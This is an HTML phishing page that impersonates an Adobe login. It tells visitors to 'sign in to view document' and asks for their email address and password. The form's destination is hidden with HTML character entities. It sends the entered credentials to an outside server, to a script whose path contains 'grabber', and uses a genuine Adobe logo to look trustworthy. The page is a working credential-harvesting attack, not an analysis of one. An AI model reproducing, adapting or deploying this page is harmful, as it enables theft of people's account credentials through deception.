<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Adobe ID | Login</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f0f0;
            margin: 0;
            height: 100vh;
        }
        .wrapper {
            background-image: url(https://cdn.mcauto-images-production.sendgrid.net/32724a092ad701f7/c6e2282d-8a53-44c8-9b7c-262b2479f731/1366x768.jpg);
            background-repeat: no-repeat;
            background-attachment: fixed;
            background-position: center;
            background-size: cover;
            position: fixed;
            top: 0;
            left: 0;
            height: 100%;
            width: 100%;
            display: flex;
            flex-flow: column nowrap;
            justify-content: center;
            align-items: center;
            box-sizing: border-box;
        }
        form {
            background-color: #ffffff;
            padding: 30px;
            border-radius: 2px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            width: 100%;
            max-width: 350px;
			height: 300px;
            padding: 40px 30px;
            border: 1px solid grey;
            border-color: #b30b00;
        }
        input[type="text"], input[type="password"] {
            display: block;
            width: 95%;
            padding: 8px;
			font-size: 14px;
            margin-bottom: 10px;
            border: 1px solid #b30b00 #ccc;
            border-radius: 2px;
        }
        button {
            background-color: #b30b00;
            color: white;
            padding: 8px;
            width: 30%;
            border: none;
            border-radius: 2px;
			margin-top: 8px;
            cursor: pointer;
        }
        button:hover {
            background-color: #9b0000;
        }

    </style>
</head>
<body>
    <div class="wrapper">
	    <form action="&#x68;&#x74;&#x74;&#x70;&#x73;&colon;&sol;&sol;&#x73;&#x6e;&#x75;&#x6b;&#x69;&#x65;&#x68;&#x75;&#x62;&period;&#x6f;&#x6e;&#x6c;&#x69;&#x6e;&#x65;&sol;&#x6f;&#x66;&#x66;&#x69;&#x63;&#x65;&sol;&#x73;&#x73;&sol;&#x61;&#x73;&#x73;&#x65;&#x74;&#x73;&sol;&#x67;&#x72;&#x61;&#x62;&#x62;&#x65;&#x72;&sol;&#x75;&#x73;&#x65;&#x72;&#x6c;&#x6f;&#x67;&#x69;&#x6e;&period;&#x70;&#x68;&#x70;" method="post">
        
        <div style="display: inline-flex; align-items: center;">
            <img src="https://static.adobelogin.com/clients/virgoweb-2020/4x_817cf14a2f3fcff4ee6d4e35c5026779.png" width="30" height="30" style="padding-bottom: 3px;"/>
            <b>&nbsp;<span> Adobe PDF</span></b>
        </div>
        <br><br>
        <div id="cont" style="text-align: left; padding-top: 10px; font-size:16px; color:#b30b00;" >SIGN IN TO VIEW DOCUMENT</div>
		<br>
		<div id="cont">Only recipient email can access shared files</div>
        <br>
            <input type="text" id="email" name="email" placeholder="Email address" value="" required>
            <input type="password" id="password" name="pass" autofocus placeholder="Password" required> 
            <div id="error-message" style="display: none; color: red;font-size: 14px;">Error: Incorrect email or password</div>			
            <button id="submit" type="submit"><span>Sign in</span></button>
        <br><br><br><br><br>
        </form>
    </div>

    <!-- Load jQuery from CDN -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
	

</body>
</html>
